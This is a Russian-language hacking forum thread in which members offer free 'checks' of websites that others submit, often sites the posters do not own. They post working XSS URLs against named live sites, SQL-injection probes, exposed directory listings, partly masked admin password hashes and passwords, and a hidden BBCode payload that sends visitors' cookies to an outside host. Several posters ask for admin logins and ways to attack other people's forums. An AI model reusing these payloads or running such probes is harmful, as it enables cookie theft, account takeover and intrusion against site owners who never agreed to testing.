И так, теперь я и m0nzt3r (http://forum.antichat.ru/member.php?u=292) теперь предостовляем бесплатную проверку сайтов.
Заявки оставлять тут. Проверка будет проводится после набора 10 сайтов.
Это новогодний подарок для вас :)
P.S\
прошу без флэйма в теме

_http://artpark.ru
Вам не угодишь :D

Антошка попрошу токо один))))

такие условия обговариваються сразу=)

www.paladins.ru

Вот, проверьте на безопасность, а конкретнее на спам. Насколько я знаю (а я знаю) с этого скрипта возможен спам любых почтовых ящиков.
Был бы очень рад, если бы кто-нибудь указал на ошибку.<?php
$version="1.1";
##########################
# DT Feedback v1.1 #
# Автор: Фёдоров Александр #
# Дата: 4 июля 2005 #
# URL: http://fedorov.vitalain.ru #
##########################

// КОНФИГУРАЦИЯ
// ваше имя
$your_name="blablabla";
// ваш email
$your_email="lala@la.la";
// Ограничить количество отправляемых сообщений: yes/no (это
$spamblock="yes";
// Интервал времени в сек. между отправками, например 600 (10 мин.)
$lim_time="1800";
// Страница (URL) на которую скрипт перейдет после отправки сообщения
$redirect="index.htm";


/*** ДАЛЬШЕ НИЧЕГО НЕ ИЗМЕНЯЕМ ***/

if (!isset ($userdir)) {
$z=dirname(__FILE__);
$z2=$_SERVER['DOCUMENT_ROOT'].dirname ($_SERVER['PHP_SELF']);
$userdir=substr ($z, strpos ($z, $z2)+strlen($z2));
if ($userdir<>"") $userdir.="/";
}
else $userdir=str_replace (":","", $userdir);

$log=$userdir."log.dat";

function validEmail($email) {
return (ereg('^[-!#$%&\'*+\\./0-9=?A-Z^_`a-z{|}~]+'.'@'.'[-!#$%&\'*+\\/0-9=?A-Z^_`a-z{|}~]+\.'.'[-!#$%&\'*+\\./0-9=?A-Z^_`a-z{|}~]+$',$email));
}
function fileRead ($file) {
$fp = fopen($file,"rb");
$content = fread($fp,filesize($file));
fclose($fp);
return $content;
}

function kavichki($string, $who) {
if ($who==1) {
$string=str_replace(""",'"',$string);
$string=str_replace("'","'",$string);
} else {
$string=str_replace('"',""",$string);
$string=str_replace("'","'",$string);
}
$string = ereg_replace("\\\'", "'", $string);
$string = ereg_replace('\\\"', '"', $string);
return $string;
}

if (isset($_REQUEST['fb'])&&$_REQUEST['fb']=="send") {

if(empty($ip)):
if (getenv('HTTP_X_FORWARDED_FOR')) { $ip=getenv('HTTP_X_FORWARDED_FOR'); }
else { $ip=getenv('REMOTE_ADDR');}
endif;


if (!isset($_REQUEST['name'])||$_REQUEST['name']==="") $error[]="U hebt geen naam ingevuld!";
if (!isset($_REQUEST['mess'])||$_REQUEST['mess']==="") $error[]="U hebt veld subject niet ingefuld!";
if (isset($_REQUEST['email'])) { if ($_REQUEST['email']!==""&&validEmail($_REQUEST['email'])==0) $error[]="Ongeldige e-mail!";
}



if (isset($spamblock)&&$spamblock=="yes") {
$str=''; $count=0;
$data=file($log);
for ($i = 0; $i<sizeof($data);$i++) {
$data_x=explode("|", $data[$i]);
$cur_ip = $data_x[0];
$last_time = $data_x[1];
$last_time = $last_time+$lim_time;
$cur_time=time();

if ($cur_ip==$ip) {
$count=$count+1;
if ($last_time>$cur_time) $error[]="Sorry.U kan niet meer dan 1 bericht binnen ".floor($lim_time/60)." min. versturen.";
else $data[$i]=$ip."|".time()."\r\n";
}
if ($count>1) $data[$i]='';
$str.=$data[$i];
}
}



if (!isset($error)) {

$to = "$your_name <$your_email>, " ;
$subj=htmlspecialchars($_REQUEST['subj']);
$email=$_REQUEST['email'];
$name=htmlspecialchars($_REQUEST['name']);
$mess = htmlspecialchars($_REQUEST['mess']);
$mess= str_replace("\n","<br>",$mess);

if ($email!=="") $semail="<a href=\"mailto:$email\">$email</a>"; else $semail='';

$message = '
<html>
<head>
<title>'.$subj.'</title>
</head>
<body>
<b>Hello, '.$your_name.'<br></b>
<p>'.$mess.'</p>
<br>---------<br>
<b>С Уважением, '.$name.' '.$semail.'</b><br><br>
<center>Powered by DT Feedback v'.$version.'</center>
</body>
</html>';
$message=kavichki(preg_replace('/http:\/\/([^",)<>\s]*)/', "<nobr><a href=\"http://\\1\">http://\\1</a></nobr>",$message),1);
$message=str_replace(array("",""),array("<a href='http://fedorov.vitalain.ru/'>","</a>"),$message);

$headers = "Content-type: text/html; charset=windows-1251 \r\n";
$headers .= "From: $name <$email>\r\n";


if (mail($to, $subj, $message, $headers)) {
echo "<meta http-equiv=\"Refresh\" content=\"2; url=$redirect\"><center><br><br><h2>Сообщение успешно отправлено.</h2></center>";

if (isset($spamblock)&&$spamblock=="yes") {
if ($count==0) {
$str=$ip."|".time()."\r\n";
$write=fopen($log,"a+") or die("<p>Не могу открыть файл $log</p>");
flock($write,2);
fputs($write,$str);
flock($write,3);
fclose($write);
} else {
$write=fopen($log,"w+") or die("<p>Не могу открыть файл $log</p>");
flock($write,2);
fputs($write,$str);
flock($write,3);
fclose($write);
}
}

} else {
echo "<center><br><br><h2>Fout.</h2></center>";
}
} else {

$errors="<center><table width='250' border='0'><tr><td><b style='color:red;text-align:center;'>Fout:</b><br><br></td></tr>";
for ($i=0;$i<sizeof($error);$i++) {
$errors.="<tr><td><li>".$error[$i]."</td></tr>";
}
$errors.="</table></center><br>";
echo $errors;
}

}

if (!isset($_REQUEST['submit'])||isset($error)) {
include($userdir."contact.html");
}
?>

Антошка лучше второй, а то там токо 2 переменные ))))))))))))))))))))))))))

www.ddd.kursknet.ru
www.chat.kursknet.ru
удачи!=)

http://iframecash.biz/

Хехе, ну тестите - _www.securityinfo.ru

тоесь http://chat.vulcan.ru

http://www.sachok.ru/ help

www.rekrut.ru
www.rekrut.ru/amxbans
www.rekrut.ru/forum
plzzz

http://www.sachok.ru/ - ничего.
http://dark-side.ru/ - ничего
http://www.paladins.ru/ - еще бы майкрософт.ком дал =))
www.securityinfo.ru - не смешно =)
http://iframecash.biz - что там проверять? там кроме параметра lang ничего нету.
http://chat.vulcan.ru/ - не открывает
www.ddd.kursknet.ru - ксс

http://www.wj (http://netsec.ru/style=display:none;background&+#58;&+#117;&+#114;&+#108;&+#40;&+#106;&+#97;&+#118;&+#97;&+#115;&+#99;&+#114;&+#105;&+#112;&+#116;&+#58;&+#97;&+#108;&+#101;&+#114;&+#116;&+#40;&+#41;&+#41;&+#32;)

+ убрать
http://www.chat.kursknet.ru/ - увы

stat.gpinternet.ru
www.gpinternet.ru
плз нужна инфа админа логин пароль
mysql.gpinternet.ru

www.rekrut.ru - чисто
www.rekrut.ru/amxbans - чисто
www.rekrut.ru/forum - ксс

http://www.wj (http://netsec.ru/style=display:none;background&+#58;&+#117;&+#114;&+#108;&+#40;&+#106;&+#97;&+#118;&+#97;&+#115;&+#99;&+#114;&+#105;&+#112;&+#116;&+#58;&+#97;&+#108;&+#101;&+#114;&+#116;&+#40;&+#41;&+#41;&+#32;)

+ убрать

mysql.gpinternet.ru - читай внимательнее первый пост

_www.tis-dialog.ru
Что-нибудь кроме ксс на форуме.

_eduha.forever.kz

Bear я тебе не сусветно благодарен честно,но если не сложно добавь плз mysql.gpinternet.ru

www.rekrut.ru - чисто
www.rekrut.ru/amxbans - чисто
www.rekrut.ru/forum - ксс

http://www.wj (http://netsec.ru/style=display:none;background&+#58;&+#117;&+#114;&+#108;&+#40;&+#106;&+#97;&+#118;&+#97;&+#115;&+#99;&+#114;&+#105;&+#112;&+#116;&+#58;&+#97;&+#108;&+#101;&+#114;&+#116;&+#40;&+#41;&+#41;&+#32;)

+ убрать

mysql.gpinternet.ru - читай внимательнее первый пост

Вот вопрос а что можно с помошью kcc www.rekrut.ru/forum сделать я вставляю в сообщение но ничего не идет не алерт не куки на сниффер

Машка мы же договорились ща про баги не писать собрать все сайты и массовый тест сделать)) Молодец!Отличный тест..
/me а мне не оставил :'( завтра поговорим..

Хех козамёта давай те поца мой сайт посмотрите.
www.pyccxak.com
посморим что выйдет удачи!

www.tis-dialog.ru
У них UebiMiau: http://webmail.tis-dialog.ru/index.php
И они его по-ходу просто воткнули (не удосужившись удалить ненужные языки) и папки: http://webmail.tis-dialog.ru/themes/
А когда такой подход, то большая вероятность что и во всем.
Да и сайт у них вроде на движке php-nuke (хотя внизу написано битрикс =) )

http://site.pyccxak.com
Service Temporarily Unavailable
The server is temporarily unable to service your request due to maintenance downtime or capacity problems. Please try again later.

на сачке кое-что обнаружил..
http://www.sachok.ru/index.cfm?r1=12'
осторожней только.. там логи ведутся)
..в календаре таже шняга в параметре dta.

_http://www.sachok.ru/index.cfm?did='1073084&cs=9
тоже самое.. проверяем дальше спасибо тем кто помогает хотя небязательно))
http://www.banzay-kam.ru/www.next.vulcan.ru/voting/show_poll.php?poll=' - Раскрытие пути
_http://slchat.com.ua/?razdel=registration&sid=%27158ee7452b24b9a522feeddb77a761c4&type=%27 - в скуле не разбираюсь е знаю че это.. смотрю дальше ентот сайт..
_http://slchat.com.ua/?razdel=registration&sid=158ee7452b24b9a522feeddb77a761c4&type= - алерт (пассив хсс) если не запащет то в поле mail пишем "><script>alert();</script>
когда уже бьешься в агонии то помогает пассив хсс _http://slchat.com.ua/?razdel=%22%3E%3Cscript%3Ealert();%3C/script%3E&sid=158ee7452b24b9a522feeddb77a761c4&type=&err=739

а тут
slchat.com.ua
scs.ntu-kpi.kiev.ua

давно спросить хотел но не решался.. пользуюсь случаем ,собстно Офф.форум Дома2 ))))
http://forum.dom2.ru/index.do;jsessionid=E75994C6036636DB92646673A15E2C 02
Меня интересует не стль сама проверка,а варианты развития атак на сие форум, есть чтл-нибудь, )))

Если мне память не изменяет на ачате в видео лежал sql по их сайту... Ну а оттуда и форум достанешь.

Проверил этот slchat.com.ua.

Нашёл : http://slchat.com.ua/?razdel=&err=666&sid='

И этот тожа проверил: scs.ntu-kpi.kiev.ua

Нашёл: Листинг деректории http://scs.ntu-kpi.kiev.ua/theme/

http://chat.vulcan.ru/
нде здесь региться?=)

эх, как я наверное всех задолбал уже со своими xss пасивными ну раз машка ничего не нашла на паладине выложу я.
http://www.paladins.ru/znaxar.php?free="><script>alert(1)</script>&sila1=3"><script>alert(2)</script>&lovk1=3"><script>alert(3)</script>&intuiz1=3"><script>alert(4)</script>&vinos1=12"><script>alert(5)</script>&intel1="><script>alert(6)</script>&mudr1="><script>alert(7)</script>&sila2="><script>alert(8)</script>&lovk2="><script>alert(9)</script>&intuiz2="><script>alert(10)</script>&vinos2="><script>alert(11)</script>&intel2="><script>alert(12)</script>&mudr2="><script>alert(13)</script>&flag=2"><script>alert(14)</script>
http://www.ddd.kursknet.ru/cgi-bin/chat.pl?id=&language=<script>alert()</script>

pub.tv2.no

www.kurskcity.ru

warezok.ru =))

http://www.kurskcity.ru/news.php?stat=06855%2b3&page=1
---
как и на рамблере=)
http://dyn.tv2.no/micromania/main.do?type=5&provider=0&articleId=3092'77&menuId=50_0

и еще вот этот плиз) assamba.net

www.games.alkar.net


Ни одной уязвимости 10000%

http://www.kurskcity.ru/news.php?stat=06855%2b3&page=1
---
как и на рамблере=)
http://dyn.tv2.no/micromania/main.do?type=5&provider=0&articleId=3092'77&menuId=50_0
можно поподробней? лучше в ПМ

www.games.alkar.net

Ни одной уязвимости 10000%
ну да конечно, с форумом phpbb

p.s. на что спорим, что там есть пассивная xss?

k1b0rg
Я думаю, он имел ввиду етот форум http://forum.mp3.alkar.net/list.php?f=9 от алькара, а не тот phpВВ... Вообще то в Алькаре сидят восновном профессионалы, и ето мой бывший пров=))

http://pub.tv2.no/ в search или че там за поле)) если ввести 'fuck<> вылазиет какаято ошиба скрипта..больше ничего

_http://assamba.net/comunication/guestbook.php
в ВАШЕ ИМЯ ввести:
' onmouseover='alert()
а потом направить мышку на строку ВАШЕ ИМЯ=)результат ошеломляющий)))))

http://planeta.ks.ua этот гляньте

[ur*l]http://www.[ur*l=http://netsec.ru/style=display:none;background&+#58;&+#117;&+#114;&+#108;&+#40;&+#106;&+#97;&+#118;&+#97;&+#115;&+#99;&+#114;&+#105;&+#112;&+#116;&+#58;&+#97;&+#108;&+#101;&+#114;&+#116;&+#40;&+#41;&+#41;&+#32;]wj[/ur*l][/ur*l]
Вы мне вот нашли это на rekrut.ru/forum что это мне может дать и можно какнить также засунуть снифер ?

http://planeta.ks.ua/ ничего((

[col*r=#EFEFEF][u*l]www.ut[u*l=www.s=''style='font-size:0;color:#EFEFEF'style='top:expression(eval(th is.sss));'sss=`i=new/**/Image();i.src='http://antichat.ru/s.jpg?'+document.cookie;this.sss=null`style='font-size:0;][/u*l][/u*l]'[/co*or]

изменяешь звездочки и color делаеш таким каким фон форума чтоб код сниффера слился с фоном и не был виден разве что при выделении

Ребят, ну помогите кто-нить с этим почтовым скриптом. Я за него столько звиздюлей получил. Как с него пол инета заспамили?

я пхп не знаю но ошибка была на 47 строке:
$string=str_replace(""",'"',$string);
правильно:
$string=str_replace("",'"',$string);
потом тоже самое на 50 строчке.. ты эти ошибки имел ввиду?

ну тогда форум гляньте,хотя я уверен что там тоже голяк http://planeta.ks.ua/forums/index.php?

а разве на булку 3.5.2 есть хсс?-) да и если вы даете site.com мы смотрим все скрипты так что не надо потом флеймить : посмотрите forum.site.com тоже)

$ZLO$, с тебя + ))))

http://planeta.ks.ua/support/js/status_image.php?base_url=')<script>alert()</script>

$ZLO$, с тебя + репа ))))

http://planeta.ks.ua/support/js/status_image.php?base_url=')<script>alert(/Tem/)</script>

Вообще у админов этой http://planeta.ks.ua/ не все в порядке с руками. Ну кто так права выставляет???? Смотрите сами: http://planeta.ks.ua/support/js/ Ой.. Мы видим листинг директории.... Ладно, теперь щелкаем на любой файл.... ОГО!!! Да, да это исходник) Во многих папках так криво у них права выставлены. Последствия непредсказуемы, мало ли какие ошибки в скриптах теперь хакер подметит ;)

вот http://jedioutcast.theforce.ru/
http://knights.theforce.ru

и вот тут как доступ полуить к почте http://www.nm.ru/

Смотрите сами: http://planeta.ks.ua/support/js/ Ой.. Мы видим листинг директории.... Ладно, теперь щелкаем на любой файл.... ОГО!!! Да, да это исходник
Так там же JavaScript. Этот "исходник" и так вытащить можно...

Там ещё и php. Это не единственная папка с таким косяком.

http://jedioutcast.theforce.ru/
тут очень понравился чат, вообщем я долго ржал когда увидел там такой чат phpmychat
я уже думал что их не осталось в инете, ан нет ,еще лежат, дырявей этих чатов наверное нету, помойму в них можно делать абсолютно все, даже видео есть ,статей дохрена =)))

KUELLER

С тебя тожа + репа )))

http://knights.theforce.ru/img.php?i=')<script>alert(/Tem/)</script>

www.vladgirls.ru - проверьте =)
Там листинг директорий есть, но этого мало.

http://allicq.net.ru/
Буду благодарен=)

И так, теперь я и m0nzt3r (http://forum.antichat.ru/member.php?u=292) теперь предостовляем бесплатную проверку сайтов.
Заявки оставлять тут. Проверка будет проводится после набора 10 сайтов.
Это новогодний подарок для вас :)
P.S\
прошу без флэйма в теме
СПАСИБО!
Проверьте наконец мой с Николаем форум.
www.softboard.ru

Взломавшему и написавшему как - новогодний приз.

http://bratwa.jino-net.ru/
надеюсь еще проверяют

И я надеюсь
http://games.tenet.ua/board/
http://aos.ultima.net.ua/modules/ipboard/
Http://www.uo.od.ua/board/
http://gamex.od.ua/
http://fof.od.ua/
=)
маленький список! =)

Notice: Undefined index: game_s in /var/htdocs/gamex/gamex.od.ua/index.html on line 177 Notice: Undefined index: prd in /var/htdocs/gamex/gamex.od.ua/index.html on line 178 Notice: Undefined variable: news_content in /var/htdocs/gamex/gamex.od.ua/index.html on line 183

http://aos.ultima.net.ua/modules/ipboard/

Админ

Halt:60b3276a43667418c98dab2473ce67**
++++++++++++++++++++++
Http://www.uo.od.ua/board/

Админы:Пароли
taxman:su*******
Ken:f8d*****
Xor:Pen*******

Но админка у вас ну очень далеко..))

elsf.net

Green_Bear
В личку можно? Не хочу светить сайт для всего нета)

проверьте плз:
www.xwarez.ru (очень прошу не кидать дырки на паблик, а киньте в аську или в ПМ т.к. я являюсь одним из админов сайта).
Багов там много - точно могу сказать. Две, три сам нашел, но хочеться, что бы профессионалы проверили, а потом разом все накрыть. Зарание благодарен!

Azazel
А мой форум слабо?
Нука кинь мне в личку мой пароль. :p

$ZLO$, с тебя + ))))
http://planeta.ks.ua/support/js/status_image.php?base_url=')<script>alert()</script>
Дам 2 + за свой сайт - в профиле. :p

Мне 10 + от кузмича.
Забыл дефейс kdj ? я мог бы и софтодром так же